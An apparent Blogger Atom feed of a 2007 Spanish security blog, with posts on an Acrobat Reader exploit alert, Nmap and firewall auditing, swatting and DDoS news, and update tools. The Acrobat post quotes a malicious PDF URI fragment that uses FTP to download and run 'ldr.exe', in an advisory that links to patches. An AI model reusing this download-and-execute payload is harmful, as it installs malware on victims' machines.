href='http://cronicasdesid.blogspot.com/feeds/1106027835951029518/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1106027835951029518' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1106027835951029518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1106027835951029518'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/manos-arriba-esto-es-un-atracoon-line.html' title='Manos arriba!! esto es un atraco...on-line'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/Ryhw6SNVMhI/AAAAAAAAABc/1fYMmlU1u2I/s72-c/ladron.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4453510016214084713</id><published>2007-10-25T08:36:00.000+02:00</published><updated>2007-11-02T09:49:36.655+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Alerta: Vulnerabilidades en productos Acrobat</title><content type='html'>Buenas....&lt;br /&gt;&lt;br /&gt;A pesar de que la vulnerabilidad no es nueva, y por lo tanto hay parche y nueva versión, existen numerosos exploit´s para &lt;a href="http://www.adobe.com/es/products/reader/"&gt;Acrobat Reader&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Especialmente estan siendo como no..unos archivos adjuntos en el correo electrónico el principal foco de infección, los archivos vienen como “BILL.pdf” y “INVOICE.pdf”, aunque los nombres pueden cambiar según el exploit &lt;code&gt;obj&lt;&gt;&gt;1&amp;amp;echo get /ldr.exe&gt;&gt;1&amp;amp;echo quit&gt;&gt;1&amp;amp;ftp -s:1 -v -A&gt;nul&amp;amp;del /q 1&amp;amp; start ldr.exe&amp;amp;” “&amp;amp;” “nul.bat)/S/ URI&gt;&lt;br /&gt;&lt;br /&gt;&lt;/code&gt; Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso.Por lo que una vez instalado el código malicioso, explota la vulnerabilidad, con la cual, se puede instalar un bot en la máquina como robo de credenciales, por un troyano.&lt;br /&gt;&lt;br /&gt;Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://isc.sans.org/diary.html?storyid=3531"&gt;Aqui &lt;/a&gt;os pongo lo que recomienda la gente de SANS.&lt;br /&gt;&lt;a href="http://www.adobe.com/support/downloads/product.jsp?product=1&amp;amp;platform=Windows"&gt;Parches &lt;/a&gt;para Acrobat Reader&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Destacar que la vulnerabilidad afecta solamente a Pc´s con Windows Xp con Internet Explorer 7.0&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Asi que ya sabeis....más vale prevenir....&lt;br /&gt;&lt;br /&gt;Información sacada del Blog de&lt;span style="font-weight: bold;"&gt; &lt;a href="http://www.sahw.com/wp/"&gt;Sergio Hernando&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4453510016214084713?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4453510016214084713/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4453510016214084713' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4453510016214084713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4453510016214084713'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/alerta-vulnerabilidades-en-productos.html' title='Alerta: Vulnerabilidades en productos Acrobat'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4715282839966234181</id><published>2007-10-22T20:42:00.000+02:00</published><updated>2007-10-22T21:06:07.519+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Nmap'/><title type='text'>Nmap</title><content type='html'>Llegó el momento tan esperado :P&lt;br /&gt;&lt;br /&gt;A continuación os explicaré en sucesivas entradas como utilizar esta herramienta asi pues...vamos a darle chicha al nmap...!!!!&lt;br /&gt;&lt;br /&gt;La herramienta está hecha para trabajar en diferentes sistemas operativos, tanto en Windows como en Unix. Dentro de mis preferencias, yo la utilizo en mi distro de linux (&lt;a href="http://fedoraproject.org/"&gt;Fedora Core 7&lt;/a&gt;) y me va como la seda.... y la verdad nunca me ha dado por instalarla en un "ventanas" , pero me imagino que con el uso que hace de los recursos del sistema dicho sistema operativo....se perderá en funcionalidad... :P&lt;br /&gt;&lt;br /&gt;La herramienta la podéis decargar de &lt;a href="http://insecure.org/nmap/download.html"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Una vez que os la instalais, sorpresa!!! no tiene iterfaz gráfica de usuario (GUI) funciona por comandos!!! asi que el que quiera pescar peces que se moje el culo!!!&lt;br /&gt;&lt;br /&gt;Me consta que hay GUI para diferentes sistemas operativos, yo por lo que he visto de la interfaz gráfica es que le resta a la herramienta potencia, puesto que no la puedes configurar con todos los parámetros que tiene...asi que ha "comandear"&lt;br /&gt;&lt;br /&gt;Lo dicho una vez instalada, tenemos que iniciar una shell ya sea a través de Ms-Dos o cualquier teminal de Unix.&lt;br /&gt;&lt;br /&gt;Una vez iniciado el modo terminal:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Escribimos nmap&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Y vemos las opciones que nos da la herramienta, así que lo que toca, es echarse un vistazo a las opciones porque mañana hablaré de ellas....&lt;/p&gt;&lt;p&gt;Cambio y corto!&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4715282839966234181?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4715282839966234181/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4715282839966234181' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4715282839966234181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4715282839966234181'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/nmap.html' title='Nmap'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5607325910461575895</id><published>2007-10-22T15:22:00.000+02:00</published><updated>2007-10-22T16:17:08.213+02:00</updated><title type='text'>SWATting or swatting</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/RxyuUY-oPPI/AAAAAAAAABU/wAcPe0zq4fo/s1600-h/swat.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/RxyuUY-oPPI/AAAAAAAAABU/wAcPe0zq4fo/s200/swat.gif" alt="" id="BLOGGER_PHOTO_ID_5124162141366533362" border="0" /&gt;&lt;/a&gt;Hasta los de azul pillan..&lt;br /&gt;&lt;br /&gt;El jueves 18 de Octubre &lt;a href="http://www.ocregister.com/news/home-emami-county-1894171-ellis-system"&gt;fue detenido un chaval de 19 años&lt;/a&gt;, como en los EE.UU, acusado de realizar un ataque denominado "SWATting or swatting".&lt;br /&gt;&lt;br /&gt;Dicho ataque consta en &lt;a href="http://es.wikipedia.org/wiki/Spoofing"&gt;spoofear &lt;/a&gt;el número de teléfono de tu víctima, para posteriormente llamar a los "Swat" y dar la falsa alarma de que en tu casa o en otro sitio pasa algo grave...&lt;br /&gt;&lt;br /&gt;Al angelito no se lo ocurrió otra cosa que, llamar a los que primeros disparan y luego preguntan...aunque por ese país yo creo que todos actuan igual, sea los hombres de azul, gris o morado...&lt;br /&gt;&lt;br /&gt;La noticia la leí &lt;a href="http://www.securityfocus.com/brief/610"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5607325910461575895?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5607325910461575895/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5607325910461575895' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5607325910461575895'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5607325910461575895'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/swatting-or-swatting.html' title='SWATting or swatting'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/RxyuUY-oPPI/AAAAAAAAABU/wAcPe0zq4fo/s72-c/swat.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5527225344493807272</id><published>2007-10-22T12:07:00.000+02:00</published><updated>2007-11-02T09:50:27.768+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Eventos'/><title type='text'>Eventos de Seguridad</title><content type='html'>Os informo de próximos eventos de seguridad en Madrid:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.capsdesi.upm.es/index.php"&gt;Capdesi &lt;/a&gt;, se ha abierto el plazo de inscripción!!! yo intentaré no perdérmelo.... el programa de las ponencias os lo dejo &lt;a href="http://www.capsdesi.upm.es/file.php/1/descargas/Programa_2doCongreso_DISI_2007.pdf"&gt;aqui.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/spain/Technet/jornadas/security/default.aspx"&gt;Microsoft Technet Security Day&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ambos eventos son gratuitos....y tal como está el &lt;a href="http://www.eleconomista.es/imag/ilustraciones/euribor_lobo_feroz.jpg"&gt;euribor&lt;/a&gt;...estas cosas se agradecen!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5527225344493807272?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5527225344493807272/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5527225344493807272' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5527225344493807272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5527225344493807272'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/eventos-de-seguridad.html' title='Eventos de Seguridad'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-3593882772567816283</id><published>2007-10-22T11:44:00.000+02:00</published><updated>2007-10-22T11:53:18.083+02:00</updated><title type='text'>Free Software</title><content type='html'>He descubierto un programa muy parecido a uno que os puse en un una entrada antigua.Dicho programa, lo que hace es verificar dentro de los programas instalados en tu sistema operativo, el estado de las actualizaciones de los mismos. También tiene un servicio de news, donde se publican las diferentes actualizaciones de los 80.000 programas que soporta la aplicación.&lt;br /&gt;&lt;br /&gt;Está en fase beta, y como sabeis, un programa que no esté actualizado, puede dar problemas tanto a nivel de sistema operativo como a nivel de seguridad.... ;)&lt;br /&gt;&lt;br /&gt;Para descargar pulsa &lt;a href="http://www.updatestar.com/"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-3593882772567816283?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/3593882772567816283/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=3593882772567816283' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3593882772567816283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3593882772567816283'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/free-software_22.html' title='Free Software'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8645563927410479056</id><published>2007-10-22T11:30:00.000+02:00</published><updated>2007-10-22T11:37:38.999+02:00</updated><title type='text'>Nueva versión de Firefox 2.0.0.8</title><content type='html'>El viernes 19 se ha lierado la nueva versión del navegador Mozilla Firefox 2.0.0.8. Esta nueva versión soluciona &lt;a href="http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.8"&gt;8 vulnerabilidades,&lt;/a&gt; de las cuales 2 son consideradas críticas...&lt;br /&gt;&lt;br /&gt;A parte, &lt;a href="http://www.mozilla.org/security/announce/2007/mfsa2007-36.html"&gt;uno de los cambios&lt;/a&gt; que se recoge en esta nueva versión, es el tratamiento de determinadas URL´s maliciosas para sistemas operativos Windows XP. Como la solución a "&lt;a href="http://www.mozilla.org/security/announce/2007/mfsa2007-29.html"&gt;cuelgues&lt;/a&gt;" del nevegador.&lt;br /&gt;&lt;br /&gt;Pulsa &lt;a href="http://www.mozilla-europe.org/es/products/firefox/"&gt;aquí &lt;/a&gt;para descargarlo&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8645563927410479056?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8645563927410479056/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8645563927410479056' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8645563927410479056'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8645563927410479056'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/nueva-versin-de-firefox-2008.html' title='Nueva versión de Firefox 2.0.0.8'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4457524931694185915</id><published>2007-10-22T11:23:00.000+02:00</published><updated>2007-10-22T11:27:35.754+02:00</updated><title type='text'>Regresé...!!!</title><content type='html'>Buenas a todos/as&lt;br /&gt;&lt;br /&gt;Despues de una semana "infernal" que he sufrido para la preparación de un examen que tuve, vuelvo a estar on-line para refrescar los contenidos del blog....&lt;br /&gt;&lt;br /&gt;Temas pendientes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Nmap&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Tratar nuevas publicaciones que tengo en el tintero....&lt;/li&gt;&lt;/ul&gt;Cambio y corto!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4457524931694185915?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4457524931694185915/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4457524931694185915' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4457524931694185915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4457524931694185915'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/regres.html' title='Regresé...!!!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8329915691873799945</id><published>2007-10-12T23:28:00.000+02:00</published><updated>2007-10-12T23:42:56.569+02:00</updated><title type='text'>Para el finde...</title><content type='html'>Lecturas recomendadas...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kriptopolis.org/nuevos-discos-duros-hibridos"&gt;Discos duros híbridos, acceder al disco duro sin encender el Pc&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.death-master.tk/"&gt;Death Master&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.sahw.com/wp/archivos/2006/10/02/introduccion-a-los-mainframes/"&gt;Auditando Mainframes&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;No todo tiene que ser informatica...&lt;br /&gt;&lt;a href="http://www.yonkis.com/"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://reyesdelmambo.com/"&gt;Los reyes del mambo...&lt;/a&gt;&lt;br /&gt;&lt;a href="http://obeygiant.com/"&gt;Obey&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8329915691873799945?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8329915691873799945/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8329915691873799945' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8329915691873799945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8329915691873799945'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/para-el-finde.html' title='Para el finde...'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4715762352317056543</id><published>2007-10-12T21:43:00.000+02:00</published><updated>2007-10-12T22:38:26.492+02:00</updated><title type='text'>Auditando Firewalls: NMAP</title><content type='html'>Seguimos con la auditorá de firewalls, y esta vez toca hacer una introducción al todopoderoso NMAP.&lt;br /&gt;&lt;br /&gt;Esta herramienta, posiblemente sea la mejor, por no decir que es el mejor scanner de puertos que existe, ya que lo tiene todo:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Es gratuita&lt;/li&gt;&lt;li&gt;La capacidad que tiene la herramienta por si misma.&lt;/li&gt;&lt;li&gt;Existe versión para Windows como para diferentes versiones de Unix.&lt;/li&gt;&lt;li&gt;La amplia información existente en la red para su uso&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Que es NMAP?&lt;/p&gt;&lt;p&gt;Nmap es una herramienta que sirve para scannear puertos con una cantidad de parámetros impresionantes, tanto para los diferentes tipos de scanneo, como los métodos soportados para crear determinados paquetes.&lt;/p&gt;&lt;p&gt;Para que se usa?&lt;/p&gt;&lt;p&gt;El uso que se da a esta herramienta, es para ver que puertos tiene publicados un host y el estado de los mismos (open/close/filter). &lt;/p&gt;&lt;p&gt;Traduzco...;) En entradas anteriores, hemos hablado de la función de un firewall, y los diferentes tipos existentes en el mercado. Desde un punto de vista de un usuario doméstico nuestro firewall personal nos está monotorizando continuamente las conexiones y nuestro equipo estaría protegido.&lt;/p&gt;&lt;p&gt;Y yo os pregunto ahora, sabeis que puertos teneis publicados por el firewall y el estado de estos puertos?. En otras palabras pensais que vuestro firewall hace su trabajo?.Nmap es la herramienta que nos va a mostrar como trabaja nuestro firewall para protegernos de conexiones no deseadas ;) &lt;/p&gt;&lt;p&gt;Cuando se inicia un ataque a nivel de red, es fundamental conocer si un host está "vivo" y si dicho host tiene puertos publicados, para saber que tipo de servicios están detrás de esos puertos abiertos... :P&lt;/p&gt;&lt;p&gt;Cada vez que hago una auditoria de una instalación de un firewall realizo un scanneo de puertos para ver si ha sido bien configurado, es decir verificar que puertos están publicados a internet y el estado de los mismos ya que las sorpresas en seguridad implican....posibles ataques&lt;/p&gt;&lt;p&gt;En la siguiente entrada entraremos en "materia", explicando el uso de la herramienta y como interpretar los resultados que nos muestra.&lt;/p&gt;&lt;p&gt;&lt;em&gt;&lt;strong&gt;Dedicado a los "admin" de firewalls en especial a uno de ellos de quien hoy es su santo...que por cierto... a ver si se anima a publicar alguna entrada...:P guapa!!!AlucarD!!!!!&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;&lt;strong&gt;Niña cierra los puertos...que te entran los barcos!!! ;)))) &lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4715762352317056543?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4715762352317056543/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4715762352317056543' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4715762352317056543'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4715762352317056543'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/auditando-firewalls-nmap.html' title='Auditando Firewalls: NMAP'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1854241098080242510</id><published>2007-10-10T15:37:00.001+02:00</published><updated>2007-10-10T15:48:04.014+02:00</updated><title type='text'>Free Software</title><content type='html'>Os pongo el enlace a un software, gratuito de la gente de &lt;a href="http://secunia.com/"&gt;Secunia&lt;/a&gt;, el programa, que es para plataformas &lt;a href="http://www.slothmud.org/%7Ehayward/mic_humor/billgat2.jpg"&gt;Micro$oft &lt;/a&gt;verifica si los programas instalados, están actualizados a la última versión y al corriente de los parches que los fabricantes han liberado.&lt;br /&gt;&lt;br /&gt;Os servirá para ver evitar &lt;a href="http://www.elobservatodo.cl/tmp_images/98/noticia_4880_normal.jpg"&gt;males mayores&lt;/a&gt; con los programas que teneis instalados y sus &lt;a href="http://es.wikipedia.org/wiki/Error_de_software"&gt;bug &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Para descargar pincha &lt;a href="https://psi.secunia.com/"&gt;aqui&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1854241098080242510?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1854241098080242510/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1854241098080242510' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1854241098080242510'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1854241098080242510'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/free-software.html' title='Free Software'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-950560695567034340</id><published>2007-10-10T11:08:00.001+02:00</published><updated>2007-10-10T11:40:14.816+02:00</updated><title type='text'>Noticia: Ataque DDoS</title><content type='html'>Buenas a todos/as&lt;br /&gt;&lt;br /&gt;Me hago eco de una &lt;a href="http://www.securityfocus.com/brief/601"&gt;noticia &lt;/a&gt;que he leido en &lt;a href="http://www.securityfocus.com/"&gt;securityfocus&lt;/a&gt;, sobre un ataque llevado a cabo contra una &lt;a href="http://www.castlecops.com/a6833-Botmasters_Take_Heed_%E2%80%93_You_Are_Being_Put_On_Notice.html"&gt;web&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Dicho ataque ha consistido en crear una&lt;a href="http://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio"&gt; denegación de servicio&lt;/a&gt; (DoS),   para que la web en cuestíon no estuviera disponible. El autor de 21 años de edad, tenía bajo su "mando" una &lt;a href="http://es.wikipedia.org/wiki/Botnet"&gt;botnet &lt;/a&gt;de nada menos que 7000 máquinas.....que mounstro el tío....&lt;br /&gt;&lt;br /&gt;Claro, el tío &lt;a href="http://www.fbi.gov/"&gt;SAM &lt;/a&gt;dió buena cuenta de ello deteniendo al personaje en cuestión.....&lt;br /&gt;&lt;br /&gt;Con una noticia así, quiero daros a entender de que consta un &lt;a href="http://es.wikipedia.org/wiki/DDoS"&gt;DDoS &lt;/a&gt;, sus consecuencias y aplicarlo a la auditoria de firewalls que estamos llevando a cabo.&lt;br /&gt;&lt;br /&gt;Como sabeis en capítulos anteriores, en las auditorias de firewall, hemos hablado de que una de las cosas que hace un firewall es bloquear conexiones, cerrando puertos para que no estén disponibles en internet. Pero que pasa si tenenemos un servidor web? ( puerto:80/ TCP) , pues que en el firewall, el puerto asociado al servicio debe de estar abierto, para que el público de internet pueda conectarse y desde su navegador ver el contenido de ese servidor.Ya que si cerramos el puerto asociado al servicio Http, no podremos publicar ninguna web y por lo tanto no dar ningún servicio, vamos que es como el que tiene hambre y se arrasca la barriga...&lt;br /&gt;&lt;br /&gt;Ahora bien, nos encontramos que si tenemos un servicio publicado por internet como puede ser un servidor Http, con su puerto correspondiente ( Puerto: 80/TCP) abierto para tener acceso desde cualquier navegador, también está accesible, para "inundarlo" a peticiones, y crear una denegación del servicio.&lt;br /&gt;&lt;br /&gt;Como veis un firewall no soluciona todos los problemas de seguridad ;)&lt;br /&gt;&lt;br /&gt;Más adelante hablaré de este tipo de ataques, como detectarlos y como remediarlos...si es que se puede...;)&lt;br /&gt;&lt;br /&gt;Por cierto queda pendiente en la siguiente entrada el uso del todopoderoso &lt;a href="http://insecure.org/nmap/"&gt;NMAP &lt;/a&gt;para el scaneo de puertos que puede tener un host abiertos/cerrados detrás de un firewall.&lt;br /&gt;&lt;br /&gt;Como siempre, al final de cada entrada se esperan comentarios.....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 